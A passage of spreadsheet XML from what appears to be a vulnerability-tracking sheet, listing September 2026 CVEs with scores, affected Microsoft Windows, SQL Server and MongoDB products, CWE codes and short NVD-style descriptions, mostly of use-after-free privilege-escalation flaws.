        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K329" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70585</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71332</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K33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30" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71333</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K33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31" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71340</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K33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32" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71342</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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33" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72963</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K33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34" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Execution Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72963</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73003</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K33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35" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73003</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73005</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K33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36" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73005</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73022</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K337"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37" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77485</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K338" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77485</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77894</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K33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39" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77899</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K340" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t>
        </is>
      </c>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77905</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K34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1" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78457</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K342" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80093</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K343"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43" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82062</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K344" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with elevated internal privileges to bypass a disabled feature gate in the applyOps command by specifying an internal replication mode value that was not intended to be client-selectable. This bypass enables execution of container operations that are disabled by default in production configurations, allowing direct storage-engine writes to arbitrary internal storage tables. The authorization check for these operations validates only the operation's namespace, not the actual storage target, enabling writes to unrelated internal metadata or other collections' data.</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83940</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K34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45" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83999</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
